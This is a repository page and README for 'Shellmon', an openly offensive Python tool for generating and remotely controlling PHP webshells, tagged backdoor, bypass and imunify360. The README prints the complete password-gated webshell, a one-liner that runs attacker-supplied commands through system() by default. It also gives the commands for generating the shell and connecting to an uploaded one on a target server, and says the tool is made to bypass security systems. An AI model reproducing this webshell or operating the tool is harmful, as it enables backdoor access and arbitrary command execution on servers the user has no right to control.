https://github.com/22xploitercrew-team/shellmon
An Simple PHP Webshell Manager to bypassed security system
https://github.com/22xploitercrew-team/shellmon
backdoor bypass bypassing hacking-tool imunify360 nano-shell python3 shell webshell
Last synced: 7 months ago
JSON representation
An Simple PHP Webshell Manager to bypassed security system
- Host: GitHub
- URL: https://github.com/22xploitercrew-team/shellmon
- Owner: 22XploiterCrew-Team
- License: mit
- Created: 2021-10-16T15:35:04.000Z (over 4 years ago)
- Default Branch: main
- Last Pushed: 2024-08-11T18:11:37.000Z (over 1 year ago)
- Last Synced: 2024-08-11T19:29:14.385Z (over 1 year ago)
- Topics: backdoor, bypass, bypassing, hacking-tool, imunify360, nano-shell, python3, shell, webshell
- Language: Python
- Homepage: https://github.com/22XploiterCrew-Team/Shellmon
- Size: 886 KB
- Stars: 17
- Watchers: 2
- Forks: 9
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
> An Simple PHP Webshell Manager
## Description
Shellmon is a tool used to create and control a webshell remotely, created using the Python3 programming language using the "Object Oriented" method. The resulting webshell has been coded very simply and has a size of no more than 80 bytes.
It provides an interactive shell in your terminal that makes it easy for you to create or control a webshell.
## Instalation
The installation process of this tool is quite easy, it does not use an external python modules that makes your computer's storage space a bit filled.
Please download this repository or you can also clone the repository using git by typing the following command in your terminal:
```bash
git clone https://github.com/22XploiterCrew-Team/Shellmon
```
after that move the pre-work directory in your terminal to the ***shellmon*** directory.
## Usage
Simple interactive shell commands make it easy to run this tool.
type `python shellmon.py` in the terminal screen to display the help command.
If you want to generate a new webshell, you just need to type this command in the terminal
```bash
python shellmon.py -p yourpassword --generate
```
webshell files will be automatically saved in your current pre-employment directory, filenames will be auto-generated with number format 0-9 and use .php extension.
Content webshell:
```php
=(isset($_GET[0])&&$_GET[0]=="yourpassword"?:die("0"))&&@$_POST[0]($_POST[1]);
```
actually the above code can still be made simpler like this
```php
=($_GET[0]=="yourpassword"?:die("0"))&&@$_POST[0]($_POST[1]);
```
but I'm worried that the server will send the status code ***500 Internal Server Error***, because this tool also checks the response code from the server and only receives the response code ***200 OK***.
Furthermore, if you want to connect your uploaded webshell to the target server, you just need to type this command on the terminal screen
```bash
python shellmon.py -u https://target.com -p yourpassword
```
display if successfully connected
you can also customize PHP shell functions by using the `--func [function]` argument, by default the function used is ***system***.
#### Support
- 22XploiterCrew
- Banyumas Cyber Team
- Jombang BlackHat